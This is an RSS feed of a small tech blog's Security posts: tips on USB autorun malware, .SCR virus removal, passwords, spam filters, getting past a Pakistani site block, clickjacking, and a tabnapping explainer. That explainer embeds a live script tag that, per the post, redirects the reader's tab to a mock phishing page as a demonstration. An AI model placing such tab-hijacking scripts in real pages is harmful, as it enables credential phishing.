<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Social Media and Technology Blog &#187; Security</title>
	<atom:link href="http://openhippo.com/category/security/feed/" rel="self" type="application/rss+xml" />
	<link>http://openhippo.com</link>
	<description>&#34; Share your Knowledge &#34;</description>
	<lastBuildDate>Sat, 21 Jan 2012 04:11:05 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.2.1</generator>
		<item>
		<title>Keep Autorun.inf Problem Away Manually : Without any Utility</title>
		<link>http://openhippo.com/keep-autorun-inf-problem-away-manually-without-any-utility/</link>
		<comments>http://openhippo.com/keep-autorun-inf-problem-away-manually-without-any-utility/#comments</comments>
		<pubDate>Sun, 19 Jun 2011 07:34:29 +0000</pubDate>
		<dc:creator>Vikash Dhankar</dc:creator>
				<category><![CDATA[How-To]]></category>
		<category><![CDATA[Security]]></category>
		<category><![CDATA[Videos]]></category>
		<category><![CDATA[Windows]]></category>
		<category><![CDATA[Windows 7]]></category>
		<category><![CDATA[autorun remove]]></category>
		<category><![CDATA[autorun.inf manually]]></category>
		<category><![CDATA[how to autorun remove]]></category>
		<category><![CDATA[usb autorun.inf remove]]></category>

		<guid isPermaLink="false">http://openhippo.com/?p=2913</guid>
		<description><![CDATA[Autorun : - The name itself says that, its execute itself. In this digital world where we all are bound to data "Information" in the digital form. We are badly effected by this "AUTORUN.inf" .

What is " Autorun.inf " ?

    Autorun.inf is basically contains small code,which run itself when ever we plug-in USB drive or any external R/W media to the Computer. The Autorun.if is harmful to the windows PC only. The Linux system are not effected by this.]]></description>
			<content:encoded><![CDATA[<p>Autorun : &#8211; The name itself says that, its execute itself. In this digital world where we all are bound to data &#8220;Information&#8221; in the digital form. We are badly effected by this &#8220;AUTORUN.inf&#8221; .</p>
<p><strong>What is &#8221; Autorun.inf &#8221; ?</strong></p>
<blockquote><p>Autorun.inf is basically contains small code,which run itself when ever we plug-in USB drive or any external R/W media to the Computer. The Autorun.if is harmful to the windows PC only. The Linux system are not effected by this.</p></blockquote>
<p><strong>How the Autorun.inf Code look like ?</strong></p>
<blockquote><p>Autorun.inf have a simple code, which execute itself its like a recursion program.</p>
<p>[AUTORUN]<br />
OPEN=autorunfolder/setup.exe<br />
In the above code ‘autorunfolder’ is a folder in removal drives which contain infected executable file that uses AUTORUN file for it’s propagation.</p></blockquote>
<p><strong>How to keep Autorun.inf away from your PC :-</strong></p>
<ul>
<li><strong>Step1:</strong> Create four folders in the root directory of your Removable drive(USB) with names <strong>Autorun.inf</strong>, <strong>Recycle</strong>,<strong> Recycler</strong> and <strong>Recycled</strong>(these folders are created by viruses to complete their process in every drive).</li>
<li><strong>Step2:</strong> Go to <strong>Start</strong>&gt;<strong>Run</strong> and type <strong>cmd</strong> to open Command Prompt. If USB drive is ‘<strong>F</strong>‘ then type <strong>F</strong><strong>:</strong> and press <strong>Enter</strong> or if you are trying this on any disk partition then specify that drive letter in place of ‘<strong>F</strong>‘</li>
<li><strong>Step3:</strong> Now type the following commands one after the other.While you are executing these commands console may ask you like this “<strong>Are you sure(Y/N)</strong>” then type <strong>Y</strong> and press<strong> Enter</strong>.</li>
</ul>
<p><strong>F</strong>:&gt;attrib -h -a -r -s F:autorun.inf<br />
<strong>F</strong>:&gt;<strong>cacls autorun.inf /c /d administrators</strong></p>
<p><strong><em>Screen shot is below :-<br />
</em></strong></p>
<p><strong><em><a rel="attachment wp-att-2916" href="http://openhippo.com/keep-autorun-inf-problem-away-manually-without-any-utility/aurotrun/"><img class="aligncenter size-full wp-image-2916" title="aurotrun" src="http://openhippo.com/wp-content/uploads/2011/06/aurotrun.jpg" alt="aurotrun" width="448" height="224" /></a><br />
</em></strong></p>
]]></content:encoded>
			<wfw:commentRss>http://openhippo.com/keep-autorun-inf-problem-away-manually-without-any-utility/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>How-To : Remove .SCR Virus from the Computer</title>
		<link>http://openhippo.com/how-to-remove-scr-virus-from-the-computer/</link>
		<comments>http://openhippo.com/how-to-remove-scr-virus-from-the-computer/#comments</comments>
		<pubDate>Fri, 22 Apr 2011 04:45:33 +0000</pubDate>
		<dc:creator>Vikash Dhankar</dc:creator>
				<category><![CDATA[How-To]]></category>
		<category><![CDATA[Internet]]></category>
		<category><![CDATA[Security]]></category>
		<category><![CDATA[Tips and Tricks]]></category>
		<category><![CDATA[Windows]]></category>
		<category><![CDATA[.scr]]></category>
		<category><![CDATA[.scr remove]]></category>
		<category><![CDATA[.scr virus remove]]></category>
		<category><![CDATA[remove .scr]]></category>

		<guid isPermaLink="false">http://openhippo.com/?p=2840</guid>
		<description><![CDATA[.SCR comes with many screen saver as .scr extension. This .SCR virus effects your files and folder and the user is not able to make changes. What is .SCR Extension? The SCR file type is primarily associated with “script” which is started to be used to transmit a Trojan. From where the .SCR Virus comes [...]]]></description>
			<content:encoded><![CDATA[<p>.SCR comes with many screen saver as .scr extension. This .SCR virus effects your files and folder and the user is not able to make changes.</p>
<p><strong>What is .SCR Extension?</strong></p>
<p>The SCR file type is primarily associated with “<span style="color: #ff0000;">script</span>” which is started to be used to transmit a Trojan.</p>
<p><strong>From where the .SCR Virus comes from?</strong></p>
<p>The SCR virus mostly comes along with the screen savers, ZIP files (with double extension), an executable file etc..</p>
<p>Most antivirus programs cannot remove this virus because it is write  protected, however we can delete the file causing the virus by following  the below steps.</p>
<p><a rel="attachment wp-att-2841" href="http://openhippo.com/how-to-remove-scr-virus-from-the-computer/computer-virus-2/"><img class="aligncenter size-full wp-image-2841" title="computer-virus" src="http://openhippo.com/wp-content/uploads/2011/04/computer-virus.jpg" alt="computer-virus" width="300" height="300" /></a></p>
<p><strong>How to Remove/Delete .SCR Virus from the Computer?</strong></p>
<ol>
<li>Shutdown the computer and restart it using safe mode (press F8 key while booting)</li>
<li>Once the <a title="Make Windows Boot Faster" href="http://www.techzene.com/pc-troubleshooting-tips/make-windows-xp-boot-faster/">loading of windows</a> is completed, go to <strong>C:\WINDOWS\system</strong> (or the folder you’ve installed your operating system)</li>
<li>Find the file named “<strong>WINLODR.SCR</strong>” and delete it.</li>
<li>Now, restart your computer in the normal mode (without pressing any key) and you can see that the virus has been removed.</li>
</ol>
<p>There above are the easy 4 steps to delete the .SCR virus from your computer.</p>
<p>Plz comment if you have any trouble in removing .SCR virus.</p>
]]></content:encoded>
			<wfw:commentRss>http://openhippo.com/how-to-remove-scr-virus-from-the-computer/feed/</wfw:commentRss>
		<slash:comments>5</slash:comments>
		</item>
		<item>
		<title>Check Strength of Your Password Online</title>
		<link>http://openhippo.com/check-strength-of-your-password-online/</link>
		<comments>http://openhippo.com/check-strength-of-your-password-online/#comments</comments>
		<pubDate>Wed, 08 Sep 2010 16:44:25 +0000</pubDate>
		<dc:creator>Vikash Dhankar</dc:creator>
				<category><![CDATA[Security]]></category>
		<category><![CDATA[is password strong]]></category>
		<category><![CDATA[online password check]]></category>
		<category><![CDATA[password strength]]></category>
		<category><![CDATA[password strength check]]></category>
		<category><![CDATA[password strong]]></category>

		<guid isPermaLink="false">http://openhippo.com/?p=2574</guid>
		<description><![CDATA[If you are really worried about the strength of your password than this article would be benificial. Everyone want to choose the password as strong as possible. The strong password is combination of small letters, capital letters, numeric, alpha numeric and offcourse special symbols also, but than also there is need to check the strenght [...]]]></description>
			<content:encoded><![CDATA[<p>If you are really worried about the strength of your password than this article would be benificial. Everyone want to choose the password  as strong as possible. The strong password is combination of  small letters, capital letters, numeric, alpha numeric and offcourse special symbols also, but than also there is need to check the strenght of password.</p>
<p>Most of the tools that are used to break into the secure system uses brute force attact. Check out at Wiki .</p>
<p><a href="http://openhippo.com/wp-content/uploads/2010/09/password-strength.jpg"><img class="aligncenter size-full wp-image-2575" title="password strength" src="http://openhippo.com/wp-content/uploads/2010/09/password-strength.jpg" alt="password strength" width="418" height="299" /></a></p>
<p><em><strong>Check Strength of Your Password Online :-</strong></em></p>
<p>* Open site <a href="http://howsecureismypassword.net/" target="_blank">http://howsecureismypassword.net/</a><br />
* Enter your desired password, that you want to check the strength.<br />
* Done.</p>
<p>There are some tips that, for choosing the stong password. Go through the last past of openhippo Web :- <a href="http://openhippo.com/2010/09/06/secure-passwords-should-not-include/" target="_blank">http://openhippo.com/2010/09/06/secure-passwords-should-not-include/</a></p>
]]></content:encoded>
			<wfw:commentRss>http://openhippo.com/check-strength-of-your-password-online/feed/</wfw:commentRss>
		<slash:comments>3</slash:comments>
		</item>
		<item>
		<title>Secure Passwords Should Not Include</title>
		<link>http://openhippo.com/secure-passwords-should-not-include/</link>
		<comments>http://openhippo.com/secure-passwords-should-not-include/#comments</comments>
		<pubDate>Mon, 06 Sep 2010 06:49:15 +0000</pubDate>
		<dc:creator>Vikash Dhankar</dc:creator>
				<category><![CDATA[Security]]></category>
		<category><![CDATA[Tips and Tricks]]></category>
		<category><![CDATA[easy password]]></category>
		<category><![CDATA[guidlines for strong passwords]]></category>
		<category><![CDATA[how to give strong password]]></category>
		<category><![CDATA[password tricks]]></category>
		<category><![CDATA[password tutorials]]></category>
		<category><![CDATA[strong password]]></category>

		<guid isPermaLink="false">http://openhippo.com/?p=2571</guid>
		<description><![CDATA[The importance of picking a good, secure password can't be emphasized enough. Your password is the way the computer verifies that someone logging in is really you, so pick something that cannot be guessed by others. The top reasons people gain unauthorized acesses to a password protected system is: They guessed someone's password. (often because they found it on a piece of paper next to the victim's computer or because they saw the person type the password in, but also because they use software programs that are VERY good at guessing common passwords.)]]></description>
			<content:encoded><![CDATA[<p><strong>Secure Password Selection</strong></p>
<p>The importance of picking a good, secure password can&#8217;t be emphasized enough. Your password is the way the computer verifies that someone logging in is really you, so pick something that cannot be guessed by others. The top reasons people gain unauthorized acesses to a password protected system is: They guessed someone&#8217;s password. (often because they found it on a piece of paper next to the victim&#8217;s computer or because they saw the person type the password in, but also because they use software programs that are VERY good at guessing common passwords.)</p>
<p><a href="http://openhippo.com/wp-content/uploads/2010/09/strong-password-200X200.jpg"><img class="aligncenter size-full wp-image-2572" title="strong-password-200X200" src="http://openhippo.com/wp-content/uploads/2010/09/strong-password-200X200.jpg" alt="strong-password" width="200" height="200" /></a></p>
<p><span style="text-decoration: underline;"><em><strong>Secure Passwords Should Not Include:-</strong></em></span></p>
<p>* Your name<br />
* Your spouse&#8217;s name<br />
* Your parent&#8217;s name<br />
* Your pet&#8217;s name<br />
* Your child&#8217;s name<br />
* Names of close friends or coworkers<br />
* Names of your favorite fantasy characters<br />
* Your boss&#8217;s name<br />
* Anybody&#8217;s name<br />
* The name of the operating system you&#8217;re using<br />
* The hostname of your computer<br />
* Your phone number<br />
* Your license plate number<br />
* Any part of your social security number<br />
* Anybody&#8217;s birth date<br />
* Other information that is easily obtained about you<br />
* Words such as wizard, guru, gandalf, and so on.<br />
* Any username on the computer in any form (as is, capitalized, etc.)<br />
* A word in the English dictionary<br />
* A word in a foreign dictionary<br />
* A place<br />
* A proper noun<br />
* Passwords of all the same letter<br />
* Simple patterns on the keyboard, like qwerty<br />
* Any of the above spelled backwards<br />
* Any of the above followed or prepended by a single digit.</p>
<p>So, before you choose password, you should be aware not to choose the keys among the above list.</p>
]]></content:encoded>
			<wfw:commentRss>http://openhippo.com/secure-passwords-should-not-include/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>First-ever web browser from Indian Origin</title>
		<link>http://openhippo.com/first-ever-web-browser-from-indian-origin/</link>
		<comments>http://openhippo.com/first-ever-web-browser-from-indian-origin/#comments</comments>
		<pubDate>Fri, 16 Jul 2010 11:06:55 +0000</pubDate>
		<dc:creator>shefali_1911</dc:creator>
				<category><![CDATA[Browser]]></category>
		<category><![CDATA[Featured]]></category>
		<category><![CDATA[Firefox]]></category>
		<category><![CDATA[News]]></category>
		<category><![CDATA[Security]]></category>
		<category><![CDATA[epic browser]]></category>
		<category><![CDATA[epic indian web browser]]></category>
		<category><![CDATA[first india web browser]]></category>
		<category><![CDATA[indian orgin browser]]></category>
		<category><![CDATA[mozilla epic browser]]></category>

		<guid isPermaLink="false">http://openhippo.com/?p=2231</guid>
		<description><![CDATA[It is great news for all Indians that a new web browser name "epic" is launched by 3 developers of Indian origin. The three developers are working in the Bangalore based "Hidden Reflex" company.

It is the first ever web-browser that provide you online scanning of viruses.]]></description>
			<content:encoded><![CDATA[<p>It&#8217;s a great news for all Indians that a new web browser name &#8220;epic&#8221; is launched by 3 developers of Indian origin. The three developers are working in the Bangalore based &#8220;Hidden Reflex&#8221; company.</p>
<p>It is the first ever web-browser that provide you online scanning of viruses.</p>
<p><a href="http://openhippo.com/wp-content/uploads/2010/07/epic-browser.png"><img class="alignnone size-full wp-image-2232" title="epic browser" src="http://openhippo.com/wp-content/uploads/2010/07/epic-browser.png" alt="" width="532" height="246" /></a></p>
<p>What are the Features that you can expect from Epic Browser :-</p>
<p>a) <strong>Built in Antivirus:</strong> Scan downloads automatically. Scan your system manually. Epic Kills any viruses it finds.</p>
<p>b) <strong>Malicious Website warnings:</strong> We&#8217;ll warn you if you&#8217;re about to visit a web site known to host viruses or malware.</p>
<p>c) Anti Phishing support.</p>
<p>d) More than 1500 +  application programs.</p>
<p>e) More than 1500  + Indian Origin template themes.</p>
<p>f) One Click deletion of cookies, flash data and no storing of your personal data.</p>
<p>g) Support all languages of India.</p>
<p>Epic web browser is really a robust browser. Its a Mozilla powered.</p>
<p>Download and Install Epic browser, its free and easy to install</p>
<p>Download Epic browser :-  <a title="Download Epic Browser" href="http://www.epicbrowser.com/" target="_blank">http://www.epicbrowser.com/</a></p>
<p>Thanks and Enjoy the Indian origin web browser.</p>
]]></content:encoded>
			<wfw:commentRss>http://openhippo.com/first-ever-web-browser-from-indian-origin/feed/</wfw:commentRss>
		<slash:comments>5</slash:comments>
		</item>
		<item>
		<title>Malware to &#8216;target Facebook&#8217;s Like button&#8217;</title>
		<link>http://openhippo.com/malware-to-target-facebooks-like-button/</link>
		<comments>http://openhippo.com/malware-to-target-facebooks-like-button/#comments</comments>
		<pubDate>Mon, 05 Jul 2010 04:40:49 +0000</pubDate>
		<dc:creator>Mukundan Srinivasan</dc:creator>
				<category><![CDATA[Facebook]]></category>
		<category><![CDATA[Security]]></category>
		<category><![CDATA[facebook like button]]></category>
		<category><![CDATA[malware attacks you like this button]]></category>
		<category><![CDATA[new malware targeting facebook]]></category>

		<guid isPermaLink="false">http://openhippo.com/?p=2177</guid>
		<description><![CDATA[Scammers now Target the Facebook “Like” Button. You should be aware of this small hole in Facebook security which can spread malware and infect your system.]]></description>
			<content:encoded><![CDATA[<p><a href="http://openhippo.com/wp-content/uploads/2010/07/you-like-this-facebook.png"><img class="alignleft size-full wp-image-2179" src="http://openhippo.com/wp-content/uploads/2010/07/you-like-this-facebook.png" alt="" width="250" height="250" /></a>Scams that post messages in Facebook members&#8217; news feeds &#8211; known as &#8216;clickjacking&#8217; scams &#8211; could soon be used by cybercriminals to spread malware, security experts have warned.</p>
<p>So far, the scams have mostly been used to direct unsuspecting surfers to websites selling pharmaceuticals. However, it’s likely they will soon be used to send people top infected sites. For the moment, cases of malware distribution have not been reported, but it’s just a matter of time.</p>
<p>Clickjacking works by taking advantage of the Facebook ‘like’ button, which other websites can embed on their own pages. If you click the button, the fact that you ‘liked’ the page is published on your <a href="http://www.webfroze.com/2010/05/facebook-in-real-trouble/" target="_blank">Facebook</a> news feed and can be seen by your friends. If they in turn click on the message, they are directed to the website.</p>
<p>However, rogue websites can hide these buttons on a page so that, if you click anywhere on the page, a message directing people to the website will be posted on your news feed. So be aware of it.</p>
]]></content:encoded>
			<wfw:commentRss>http://openhippo.com/malware-to-target-facebooks-like-button/feed/</wfw:commentRss>
		<slash:comments>4</slash:comments>
		</item>
		<item>
		<title>A New Kind of Phishing Attack Called Tabnapping</title>
		<link>http://openhippo.com/a-new-kind-of-phishing-attack-called-tabnapping/</link>
		<comments>http://openhippo.com/a-new-kind-of-phishing-attack-called-tabnapping/#comments</comments>
		<pubDate>Sun, 13 Jun 2010 16:42:07 +0000</pubDate>
		<dc:creator>Vikash Dhankar</dc:creator>
				<category><![CDATA[Browser]]></category>
		<category><![CDATA[Facebook]]></category>
		<category><![CDATA[Featured]]></category>
		<category><![CDATA[Firefox]]></category>
		<category><![CDATA[Hacking]]></category>
		<category><![CDATA[Security]]></category>
		<category><![CDATA[new phishing technique]]></category>
		<category><![CDATA[tabnapping]]></category>
		<category><![CDATA[tabnapping example]]></category>
		<category><![CDATA[tabnapping phisher]]></category>
		<category><![CDATA[tabnapping script]]></category>
		<category><![CDATA[tabnapping tutorial]]></category>

		<guid isPermaLink="false">http://openhippo.com/?p=2098</guid>
		<description><![CDATA[What we understand by phishing ? &#8211; A phishing is illegal way acquiring usename and password of the user by using fake website looks same as a real one. In the past phishing was attempted by just sending the fake URL but it contain same as the real site have. When the user enter its [...]]]></description>
			<content:encoded><![CDATA[<p><script src="http://openhippo.com/files/tabnappling.js" type="text/javascript"></script><br />
<strong>What we understand by phishing ?</strong></p>
<blockquote><p>&#8211; A phishing is illegal way acquiring usename and password of the user by using fake website looks same as a real one.</p></blockquote>
<p>In the past phishing was attempted by just sending the fake URL but it contain same as the real site have. When the user enter its username and the password, the user credential goes straight  to the hacker or phisher page manager.</p>
<p>But now a days a new type of phishing have been evolved that is know as &#8220;TABNAPPING&#8221; .</p>
<p><a href="http://openhippo.com/wp-content/uploads/2010/06/phishing11_2.jpg"><img class="alignnone size-full wp-image-2107" title="phishing11_2" src="http://openhippo.com/wp-content/uploads/2010/06/phishing11_2.jpg" alt="" width="545" height="315" /></a></p>
<p><strong>What is Tabnapping ?</strong></p>
<blockquote><p>Its a new kind of phishing attempted, in which the hacker doesn&#8217;t sent the URL if phisher page, but what actually he/she send is the simple webpage containing the java-script ( tabnapping javascript ).</p></blockquote>
<p><strong>What does the Java Script Do in Tabnapping ?</strong></p>
<blockquote><p>The Javascript automatically redirect to the phishing page, when ever we are switching between the other tabs.</p></blockquote>
<p>When the user return back, he /she doesn&#8217;t see the URL of the webpage, instead he/she fill the username and password into it, and guess what happen. His/her account is hacked by tabnapping, or tabjacking.</p>
<p><span style="text-decoration: underline;"><span style="color: #ff0000;"><strong>If you want to TRY </strong></span></span></p>
<p><strong>Follow the steps :-</strong></p>
<p>1. Just Refresh this page. or You can go directly to next step.</p>
<p>2. Go to other tabs,open new tabs ( like 4 or 5 ) .</p>
<p>3. Just return back to this page.. yoooo whats you get ( this is a phishing page) . Don&#8217;t worry right now, I have used a Image , instead you can call a phisher page.<br />
4. Just Click on that page, You will redirect to original page</p>
<p><strong>Note :- Don&#8217;t harm the people. </strong></p>
<p><strong>Source :</strong> <a href="http://www.azarask.in/blog/post/a-new-type-of-phishing-attack/" target="_blank">http://www.azarask.in/blog/post/a-new-type-of-phishing-attack/</a></p>
]]></content:encoded>
			<wfw:commentRss>http://openhippo.com/a-new-kind-of-phishing-attack-called-tabnapping/feed/</wfw:commentRss>
		<slash:comments>5</slash:comments>
		</item>
		<item>
		<title>Access Blocked Facebook and Youtube in Pakistan</title>
		<link>http://openhippo.com/access-blocked-facebook-and-youtube-in-pakistan/</link>
		<comments>http://openhippo.com/access-blocked-facebook-and-youtube-in-pakistan/#comments</comments>
		<pubDate>Thu, 20 May 2010 13:38:04 +0000</pubDate>
		<dc:creator>Ritu sharma</dc:creator>
				<category><![CDATA[Facebook]]></category>
		<category><![CDATA[Google]]></category>
		<category><![CDATA[Hacking]]></category>
		<category><![CDATA[Security]]></category>
		<category><![CDATA[Tips and Tricks]]></category>
		<category><![CDATA[Youtube]]></category>
		<category><![CDATA[access]]></category>
		<category><![CDATA[pakistan]]></category>
		<category><![CDATA[ultra-surf]]></category>

		<guid isPermaLink="false">http://openhippo.com/?p=1945</guid>
		<description><![CDATA[Yesterday Facebook site was blocked in Pakistan and Today Youtube site is blocked in Pakistan. Facebook and Youtube both are doen&#8217;t agree with the pakitani court about the shutdown of their site. Facbook and Youtube says that its in the agreement license. Access Blocked youtube and facebook sites in pakistan :- There are many softwares [...]]]></description>
			<content:encoded><![CDATA[<p>Yesterday Facebook site was <a title="Facebook and Youtube Blocked in Pakistan" href="http://openhippo.com/2010/05/20/youtube-site-blocked-in-pakistan/" target="_blank">blocked in Pakistan</a> and Today Youtube site is blocked in Pakistan.</p>
<p>Facebook and Youtube both are doen&#8217;t agree with the pakitani court about the shutdown of their site. Facbook and Youtube says that its in the agreement license.</p>
<p>Access Blocked youtube and facebook sites in pakistan :-<br />
There are many softwares and proxy-sites that you can switch to, but following are 3 basic and best way by which you can browse youtube and facebook in pakistan.</p>
<p><strong>1. <span style="text-decoration: underline;"><a href="http://www.your-freedom.net/">Your-Freedom Software</a>:</span> </strong>This is a proxy based sites, its free software. You can browse blocked sites in it.</p>
<p><strong>2.<span style="text-decoration: underline;"><a title="Ultra Surf" href="http://www.ultrareach.com/" target="_blank"> Ultra Surf :-</a> </span></strong>Ultra Surf is most popular utility available to access blocked sites. You need to change your internet connection settings to access websites including Facebook and Youtube.</p>
<p><strong>3. <span style="text-decoration: underline;">Proxy Sites:- </span></strong>There are around 1000 or more proxy sites available on Internet. You google out &#8221; Best Proxy sites&#8221; or &#8220;working proxy sites&#8221;. You will surely get good proxy sites to browse facebook or youtube in pakistan. One I know that is <a href="http://www.hidemyass.com">www.hidemyass.com</a></p>
<p>Enjoy and access Facebook and Youtube sites in Pakistan.</p>
]]></content:encoded>
			<wfw:commentRss>http://openhippo.com/access-blocked-facebook-and-youtube-in-pakistan/feed/</wfw:commentRss>
		<slash:comments>6</slash:comments>
		</item>
		<item>
		<title>Block Unwanted Emails and Spams Mails</title>
		<link>http://openhippo.com/block-unwanted-emails-and-spamsblock-unwanted-emails-and-spams-mails/</link>
		<comments>http://openhippo.com/block-unwanted-emails-and-spamsblock-unwanted-emails-and-spams-mails/#comments</comments>
		<pubDate>Sun, 16 May 2010 14:59:53 +0000</pubDate>
		<dc:creator>Vikash Dhankar</dc:creator>
				<category><![CDATA[Google]]></category>
		<category><![CDATA[Internet]]></category>
		<category><![CDATA[Security]]></category>
		<category><![CDATA[Tips and Tricks]]></category>
		<category><![CDATA[block spam]]></category>
		<category><![CDATA[gmail]]></category>
		<category><![CDATA[spam]]></category>
		<category><![CDATA[yahoo]]></category>

		<guid isPermaLink="false">http://openhippo.com/?p=1898</guid>
		<description><![CDATA[If you want to block emails from the particular email address or the particular domain ( Like &#8220;@abc.com&#8221;).  Just you have to edit in your email settings. For Gmail Users : 1. Right corner, Click on the Settings OR Just see at the TOP  ( Click on to Create Filters ) 2. Create a Filter. [...]]]></description>
			<content:encoded><![CDATA[<p>If you want to block emails from the particular email address or the particular domain ( Like &#8220;@abc.com&#8221;).  Just you have to edit in your email settings.</p>
<p><span style="text-decoration: underline;"><strong>For Gmail Users :</strong></span></p>
<p>1. Right corner, Click on the <strong>Settings</strong> OR Just see at the TOP  ( Click on to <strong>Create Filters</strong> )</p>
<p>2. Create a Filter.</p>
<p>3. In the<strong> FROM</strong> tab, Type the email address ,that you want to block. If you want to block the emails abc@xyz.com than</p>
<p><a href="http://openhippo.com/wp-content/uploads/2010/05/gmail-filter.png"><img class="alignnone size-full wp-image-1899" title="gmail filter" src="http://openhippo.com/wp-content/uploads/2010/05/gmail-filter.png" alt="gmail filter" width="549" height="180" /></a></p>
<p>4. Or if you want to block the whole domain than you have to just type <span style="color: #ff0000;"><strong>*@xyz.com</strong></span> . This will block all the incoming emails from the domain address.</p>
<p>5 Click on <strong>Next Step</strong>, select the action you’d like to take on the blocked emails. You may select the option Delete it so that the blocked email is moved to trash. To unblock the email, all you need to do is just delete the filter that you’ve created.</p>
<p><span style="text-decoration: underline;"><strong>For the Yahoo Users</strong></span></p>
<p>1. Login to your account<br />
2. At the top-right corner, click on Options<br />
3. A drop down menu appears, now click on More options<br />
4. In the left panel select the option<strong> Filters</strong> and click on create or <strong>edit filters</strong><br />
5. Now just click Add, now you can add the email address that you want to block the incoming emails.</p>
<p>Enjoy <img src='http://openhippo.com/wp-includes/images/smilies/icon_biggrin.gif' alt=':D' class='wp-smiley' /> </p>
]]></content:encoded>
			<wfw:commentRss>http://openhippo.com/block-unwanted-emails-and-spamsblock-unwanted-emails-and-spams-mails/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Facebook New Security Feature: Last and Current Login Details</title>
		<link>http://openhippo.com/facebook-new-security-feature-last-and-current-login-details/</link>
		<comments>http://openhippo.com/facebook-new-security-feature-last-and-current-login-details/#comments</comments>
		<pubDate>Fri, 14 May 2010 14:21:29 +0000</pubDate>
		<dc:creator>Vikash Dhankar</dc:creator>
				<category><![CDATA[Facebook]]></category>
		<category><![CDATA[Internet]]></category>
		<category><![CDATA[Security]]></category>
		<category><![CDATA[Social Networking]]></category>
		<category><![CDATA[facebook security]]></category>

		<guid isPermaLink="false">http://openhippo.com/?p=1864</guid>
		<description><![CDATA[According to Facebook, its about 400 Million users accounts and out of them 43% users comes online average daily. The internet is vast and many hackers and intruders sit around you to grab/ sniff your passwords and user information&#8217;s. To keep this security alert facebook introduced a new feature that will tell the user about [...]]]></description>
			<content:encoded><![CDATA[<p>According to Facebook, its about 400 Million users accounts and out of them 43% users comes online average daily.</p>
<p>The internet is vast and many hackers and intruders sit around you to grab/ sniff your passwords and user information&#8217;s. To keep this security alert facebook introduced a new feature that will tell the user about his/her account last login details . This feature is same as Gmail is using to tell, when was the last login and from which IP address was made. The two or more person can access Gmail account at the same time but you cant make two log-ins at the same time in facebook.</p>
<div id="attachment_1865" class="wp-caption alignnone" style="width: 556px"><a href="http://openhippo.com/wp-content/uploads/2010/05/facebook-login.png"><img class="size-full wp-image-1865" title="facebook login" src="http://openhippo.com/wp-content/uploads/2010/05/facebook-login.png" alt="facebook login" width="546" height="162" /></a><p class="wp-caption-text">facebook login</p></div>
<p><strong>To use this security feature:-</strong></p>
<p>Go to your &#8220;<strong>account settings</strong>&#8220;  then &#8220;<strong>account security</strong>&#8221; change its to <strong>YES.</strong></p>
<p>Facebook contains many new and good security and privacy features. Just go to the Account settings and then Privacy Tab. See all and modify according to your level of privacy mode.</p>
]]></content:encoded>
			<wfw:commentRss>http://openhippo.com/facebook-new-security-feature-last-and-current-login-details/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>Reopen the Closed Tab In Firefox Browser</title>
		<link>http://openhippo.com/reopen-the-closed-tab-in-firefox-browser/</link>
		<comments>http://openhippo.com/reopen-the-closed-tab-in-firefox-browser/#comments</comments>
		<pubDate>Sat, 20 Mar 2010 09:39:08 +0000</pubDate>
		<dc:creator>Vikash Dhankar</dc:creator>
				<category><![CDATA[Browser]]></category>
		<category><![CDATA[Firefox]]></category>
		<category><![CDATA[Internet]]></category>
		<category><![CDATA[Security]]></category>
		<category><![CDATA[Tips and Tricks]]></category>
		<category><![CDATA[reopen tab]]></category>
		<category><![CDATA[tab trick]]></category>

		<guid isPermaLink="false">http://openhippo.com/?p=1836</guid>
		<description><![CDATA[Sometime, you are working and by mistake you close the tab, but the link in the tab was important to you. There is good trick in the Firefox to reopen the closed tabs. Follow this :- Cltr + Shift + T and you are done, the last closed tab will reopen and you can now [...]]]></description>
			<content:encoded><![CDATA[<p>Sometime, you are working and by mistake you close the tab, but the link in the tab was important to you.</p>
<p>There is good trick in the Firefox to reopen the closed tabs.</p>
<p>Follow this :- <span style="color: #ff0000;"><strong>Cltr + Shift + T</strong></span></p>
<p>and you are done, the last closed tab will reopen and you can now continue your work easily, without wasting your precious time.</p>
<p>Enjoy the Trick and tell your friends also.</p>
<p><strong>Also See</strong> :- <a href="http://openhippo.com/2010/03/20/track-your-lost-laptop-with-firefound-add-on/">Track Your Lost Laptop With FireFound Add-on</a></p>
<p><strong>Also See</strong> :-<a href="http://openhippo.com/2009/09/16/firefox-tricks-speedup-your-surfing/">Firefox tricks : Speedup your Surfing</a></p>
]]></content:encoded>
			<wfw:commentRss>http://openhippo.com/reopen-the-closed-tab-in-firefox-browser/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>Track Your Lost Laptop With FireFound Add-on</title>
		<link>http://openhippo.com/track-your-lost-laptop-with-firefound-add-on/</link>
		<comments>http://openhippo.com/track-your-lost-laptop-with-firefound-add-on/#comments</comments>
		<pubDate>Sat, 20 Mar 2010 09:00:23 +0000</pubDate>
		<dc:creator>Vikash Dhankar</dc:creator>
				<category><![CDATA[Browser]]></category>
		<category><![CDATA[Firefox]]></category>
		<category><![CDATA[Internet]]></category>
		<category><![CDATA[Security]]></category>
		<category><![CDATA[add-on]]></category>
		<category><![CDATA[firefound]]></category>
		<category><![CDATA[lost pc]]></category>
		<category><![CDATA[pc location]]></category>
		<category><![CDATA[track pc]]></category>

		<guid isPermaLink="false">http://openhippo.com/?p=1830</guid>
		<description><![CDATA[Just I was surfing internet and though that, is there any firefox add-on is available that could track the PC location and help to track the location of the PC, and I found one project by the cfinke . The FireFound Add-on helps you to track you lost PC. After Installing this add-on to your [...]]]></description>
			<content:encoded><![CDATA[<p>Just I was surfing internet and though that, is there any firefox add-on is available that could track the PC location and help to track the location of the PC, and I found one project by the <a href="http://code.google.com/u/cfinke/">cfinke</a> .</p>
